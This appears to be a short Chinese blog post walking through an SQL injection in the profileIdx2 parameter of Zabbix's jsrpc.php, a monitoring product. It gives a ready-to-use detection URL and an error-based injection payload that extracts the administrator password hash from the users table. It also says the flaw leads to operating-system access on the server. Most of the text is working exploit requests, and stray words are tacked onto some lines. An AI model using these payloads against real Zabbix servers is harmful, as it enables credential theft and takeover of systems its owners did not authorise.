zabbix是一個開源的企業級性能監控解決方案。php
官方網站:http://www.zabbix.commysql
zabbix的jsrpc的profileIdx2參數存在insert方式的SQL注入漏洞,攻擊者無需受權登錄便可登錄zabbix管理系統,也可經過script等功能輕易直接獲取zabbix服務器的操做系統權限。web
首先打開登陸頁面 檢測是否能夠guest登陸。
而後xx.com/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
如出現mysql報錯提示,則表示存在該sql注入漏洞。
獲取密碼hash:
xx.com/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2%20&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph%20&profileIdx2=(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,(select%20passwd%20from%20users%20limit%200,1),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297%20&action=showlatest&filter=&filter_task=&mark_color=1